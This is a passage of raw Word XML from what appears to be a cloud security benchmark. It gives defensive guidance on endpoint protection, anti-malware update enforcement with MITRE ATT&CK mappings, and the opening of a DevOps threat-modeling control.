    <w:p w14:paraId="17B8B577" w14:textId="3A365490" w:rsidR="005E56C6" w:rsidRDefault="005E56C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005E56C6">
        <w:t>Enable LSASS protection blocking credential stealing from Windows Local Security Authority Subsystem monitoring for false positives affecting legitimate security tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492CE601" w14:textId="77777777" w:rsidR="005E56C6" w:rsidRDefault="005E56C6" w:rsidP="005E56C6"/>
    <w:p w14:paraId="70CE554A" w14:textId="77777777" w:rsidR="005E56C6" w:rsidRDefault="005E56C6" w:rsidP="005E56C6"/>
    <w:p w14:paraId="10552B2E" w14:textId="15AAA07E" w:rsidR="005E56C6" w:rsidRDefault="005E56C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005E56C6">
        <w:t>Monitor ASR rule effectiveness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C4A765" w14:textId="195A36CE" w:rsidR="005E56C6" w:rsidRDefault="005E56C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005E56C6">
        <w:t>Review ASR rule block events weekly identifying attack patterns and adjusting rule configurations optimizing security coverage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6E2731" w14:textId="571D95F5" w:rsidR="00612FDC" w:rsidRDefault="00612FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="292"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00612FDC">
        <w:t>Network protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B1D023" w14:textId="0D070729" w:rsidR="00612FDC" w:rsidRDefault="00612FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00612FDC">
        <w:t>Web threat protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB63C13" w14:textId="078D3588" w:rsidR="00612FDC" w:rsidRDefault="00612FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="295"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00612FDC">
        <w:lastRenderedPageBreak/>
        <w:t>Blocking connections to malicious IP addresses, domains, and URLs preventing command-and-control communications and malicious downloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EB539F" w14:textId="6938502A" w:rsidR="00612FDC" w:rsidRDefault="00612FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00612FDC">
        <w:t>SmartScreen integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB81000" w14:textId="05922C1A" w:rsidR="00612FDC" w:rsidRDefault="00612FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="295"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00612FDC">
        <w:t>Microsoft Defender SmartScreen real-time reputation checks for downloaded files and visited websites preventing access to known phishing and malware distribution sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EADDAF" w14:textId="1FD7A883" w:rsidR="00612FDC" w:rsidRDefault="00612FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00612FDC">
        <w:t>Network intrusion prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540EAC98" w14:textId="5D982E0E" w:rsidR="00612FDC" w:rsidRDefault="00612FDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="295"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00612FDC">
        <w:t>Detection and blocking of network-based exploit attempts and lateral movement activities at the endpoint level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAD2C41" w14:textId="52817256" w:rsidR="00736B0E" w:rsidRDefault="00736B0E" w:rsidP="00736B0E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc242449559"/>
      <w:r w:rsidRPr="00736B0E">
        <w:t>Cloud Endpoint Security Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w14:paraId="19B574A0" w14:textId="1DE1A22E" w:rsidR="0012178E" w:rsidRDefault="0012178E" w:rsidP="0012178E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc242449560"/>
      <w:r w:rsidRPr="0012178E">
        <w:t>ES-3: Ensure anti-malware software and signatures are updated</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="45A0A949" w14:textId="54777AEC" w:rsidR="0012178E" w:rsidRDefault="0012178E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="296"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0012178E">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3246EBD7" w14:textId="6488535B" w:rsidR="0012178E" w:rsidRDefault="0012178E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0012178E">
        <w:t>Maintain current anti-malware protection through automated signature updates, software version management, and update compliance monitoring. Ensure all endpoints receive timely protection updates minimizing vulnerability windows and maintaining effective threat detection capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6472359F" w14:textId="270C62FB" w:rsidR="0012178E" w:rsidRDefault="0012178E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="296"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0012178E">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0012178E">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="60405CFA" w14:textId="137F0523" w:rsidR="0012178E" w:rsidRDefault="0012178E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0012178E">
        <w:t>Known malware detection failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7DDA22" w14:textId="335A4015" w:rsidR="0012178E" w:rsidRDefault="0012178E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="297"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0012178E">
        <w:t>Outdated signatures cannot detect new malware variants, exploits, and threat campaigns identified after last update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A70C91" w14:textId="77777777" w:rsidR="0012178E" w:rsidRDefault="0012178E" w:rsidP="0012178E"/>
    <w:p w14:paraId="5C70FCFD" w14:textId="77777777" w:rsidR="0012178E" w:rsidRDefault="0012178E" w:rsidP="0012178E"/>
    <w:p w14:paraId="01DC3C2B" w14:textId="5CC04212" w:rsidR="0012178E" w:rsidRDefault="0012178E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0012178E">
        <w:t>Protection bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42593057" w14:textId="36B44CBC" w:rsidR="0012178E" w:rsidRDefault="0012178E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="297"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0012178E">
        <w:t>Attackers specifically target endpoints with outdated protection knowing signature gaps allow malware execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5315EF8F" w14:textId="7B03F0F0" w:rsidR="0012178E" w:rsidRDefault="0012178E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0012178E">
        <w:t>Exploit vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDC8D61" w14:textId="368D0541" w:rsidR="0012178E" w:rsidRDefault="0012178E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="297"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0012178E">
        <w:lastRenderedPageBreak/>
        <w:t>Unpatched anti-malware software contains vulnerabilities that attackers exploit to disable protection or escalate privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771EB338" w14:textId="36EA9FBC" w:rsidR="0012178E" w:rsidRDefault="0012178E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0012178E">
        <w:t>Compliance violations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ECC494" w14:textId="40EB35FE" w:rsidR="0012178E" w:rsidRDefault="0012178E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="297"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0012178E">
        <w:t>Regulatory frameworks require current anti-malware protection with audit failures resulting from outdated signatures or software versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327C0757" w14:textId="12C077F7" w:rsidR="0012178E" w:rsidRDefault="0012178E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0012178E">
        <w:t>Incident response gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D6BD7A" w14:textId="7D5AC0AC" w:rsidR="0012178E" w:rsidRDefault="0012178E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="297"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0012178E">
        <w:t>Outdated protection prevents detection during initial attack phases allowing threats to establish persistence before updates enable detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AC49AC" w14:textId="44629ED4" w:rsidR="0012178E" w:rsidRDefault="0012178E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="296"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0012178E">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0AB5CE" w14:textId="74078D4F" w:rsidR="0012178E" w:rsidRDefault="0012178E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0012178E">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7022332E" w14:textId="30E92764" w:rsidR="00EC40F9" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="439"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>impair defenses (T1562) exploiting outdated anti-malware to avoid detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087BD8F4" w14:textId="27309566" w:rsidR="0012178E" w:rsidRDefault="0012178E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0012178E">
        <w:t>Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEBC1AA" w14:textId="4C3C07D6" w:rsidR="00EC40F9" w:rsidRDefault="00EC40F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="439"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC40F9">
        <w:t>exploitation for client execution (T1203) leveraging known exploits that current signatures would detect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E996E8" w14:textId="40A067BF" w:rsidR="00D824EA" w:rsidRDefault="00D824EA" w:rsidP="00D824EA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D824EA">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>ES-3.1: Configure and enforce automated updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FE4C66" w14:textId="093BB4CA" w:rsidR="00D824EA" w:rsidRDefault="00D824EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="298"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D824EA">
        <w:t>Maintain current anti-malware effectiveness through these update processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07506D99" w14:textId="4457C27A" w:rsidR="00D824EA" w:rsidRDefault="00D824EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D824EA">
        <w:t>Implement automated anti-malware signature and software update processes with compliance monitoring and enforcement ensuring endpoints maintain current protection without manual intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46199C5C" w14:textId="720B9928" w:rsidR="00D824EA" w:rsidRDefault="00D824EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="298"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D824EA">
        <w:t>Automated update configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009A95AD" w14:textId="342A1F80" w:rsidR="00D824EA" w:rsidRDefault="00D824EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D824EA">
        <w:t>Enable automatic signature updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617E2CD8" w14:textId="405FD51E" w:rsidR="00D824EA" w:rsidRDefault="00D824EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D824EA">
        <w:t>Configure automatic signature update checks multiple times daily ensuring rapid deployment of new threat intelligence addressing emerging threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4FBEF3" w14:textId="593BFB87" w:rsidR="00D824EA" w:rsidRDefault="00D824EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D824EA">
        <w:t>Enable automatic engine updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFBDF74" w14:textId="0FFF96FD" w:rsidR="00D824EA" w:rsidRDefault="00D824EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D824EA">
        <w:t>Configure automated detection engine and platform updates ensuring endpoints receive enhanced detection capabilities and critical security improvements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8875D6" w14:textId="77777777" w:rsidR="00D824EA" w:rsidRDefault="00D824EA" w:rsidP="00D824EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ECC7BC0" w14:textId="6E2C0DD0" w:rsidR="00D824EA" w:rsidRDefault="00D824EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D824EA">
        <w:t>Configure reliable update sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D90D0AB" w14:textId="5B5260D4" w:rsidR="00D824EA" w:rsidRDefault="00D824EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D824EA">
        <w:lastRenderedPageBreak/>
        <w:t>Establish primary cloud-delivered updates with failover mechanisms ensuring consistent update delivery protecting against update service disruptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B9F750" w14:textId="300F1E4C" w:rsidR="00D824EA" w:rsidRDefault="00D824EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D824EA">
        <w:t>Validate update integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512199EB" w14:textId="3D7126DB" w:rsidR="00D824EA" w:rsidRDefault="00D824EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D824EA">
        <w:t>Enable automated validation of signature and software updates before deployment preventing corrupted or malicious update packages from compromising endpoint protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633F0C9F" w14:textId="6026F963" w:rsidR="00D824EA" w:rsidRDefault="00D824EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D824EA">
        <w:t>Test critical updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7138AB" w14:textId="4CBACA69" w:rsidR="00D824EA" w:rsidRDefault="00D824EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D824EA">
        <w:t>Validate major software version updates in non-production environments confirming compatibility and effectiveness before production deployment preventing operational disruptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F57C665" w14:textId="1B38F2AF" w:rsidR="00D824EA" w:rsidRDefault="00D824EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="298"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D824EA">
        <w:t>Compliance monitoring and enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A75348E" w14:textId="7F96F47D" w:rsidR="00D824EA" w:rsidRDefault="00320214">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00320214">
        <w:t>Monitor update compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5595AD1C" w14:textId="38A37EB3" w:rsidR="00320214" w:rsidRDefault="00320214">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="300"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00320214">
        <w:t>Track signature age and software versions across endpoints identifying devices with outdated protection exceeding security policy thresholds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4F9724" w14:textId="37528BDD" w:rsidR="00320214" w:rsidRDefault="00320214">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00320214">
        <w:t>Enforce automated remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63421573" w14:textId="4C72FD9C" w:rsidR="00320214" w:rsidRDefault="00320214">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="300"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00320214">
        <w:t>Configure automated update enforcement for non-compliant endpoints ensuring timely protection updates without manual intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046A7C1D" w14:textId="6608D963" w:rsidR="00320214" w:rsidRDefault="00320214">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00320214">
        <w:t>Restrict non-compliant access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5E58DF" w14:textId="6E60A7D3" w:rsidR="00320214" w:rsidRDefault="00320214">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="300"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00320214">
        <w:t xml:space="preserve">Integrate with network access control restricting access </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00320214">
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00320214">
        <w:t xml:space="preserve"> endpoints with critically outdated protection until remediation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00320214">
        <w:t>completed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00320214">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34451380" w14:textId="38941EE8" w:rsidR="00320214" w:rsidRDefault="00320214">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00320214">
        <w:t>Manage security exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3582A817" w14:textId="5C000F25" w:rsidR="00320214" w:rsidRPr="00D824EA" w:rsidRDefault="00320214">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="300"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00320214">
        <w:t>Establish formal exception process for endpoints requiring delayed updates with documented compensating controls and time-limited approvals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083FEB12" w14:textId="77777777" w:rsidR="0012178E" w:rsidRDefault="0012178E" w:rsidP="0012178E"/>
    <w:p w14:paraId="500DEC4A" w14:textId="77777777" w:rsidR="0012178E" w:rsidRDefault="0012178E" w:rsidP="0012178E"/>
    <w:p w14:paraId="36E723E8" w14:textId="77777777" w:rsidR="0012178E" w:rsidRDefault="0012178E" w:rsidP="0012178E"/>
    <w:p w14:paraId="6F09D0B2" w14:textId="721EF519" w:rsidR="00393833" w:rsidRPr="00E53977" w:rsidRDefault="00393833" w:rsidP="00393833">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc242449561"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DevOps Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w14:paraId="2B241460" w14:textId="3F99DC34" w:rsidR="00393833" w:rsidRPr="00E53977" w:rsidRDefault="00393833" w:rsidP="00393833">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc242449562"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Secure the design and supply chain</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w14:paraId="14F247CD" w14:textId="2A425511" w:rsidR="00393833" w:rsidRPr="00E53977" w:rsidRDefault="00393833" w:rsidP="00393833">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc242449563"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">DS-1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00172665">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Conduct threat modeling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w14:paraId="458350F8" w14:textId="29E2B0F6" w:rsidR="00393833" w:rsidRPr="00E53977" w:rsidRDefault="00393833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E7EB39" w14:textId="12716AC9" w:rsidR="00393833" w:rsidRPr="00E53977" w:rsidRDefault="00393833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2610"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement systematic threat modeling using the STRIDE methodology during the design phase to identify potential security threats, prioritize risks, and implement appropriate mitigations before code development begins. This shift-left approach reduces remediation costs and improves overall security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B7EAD6" w14:textId="6A7E1068" w:rsidR="00393833" w:rsidRPr="00E53977" w:rsidRDefault="00393833">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
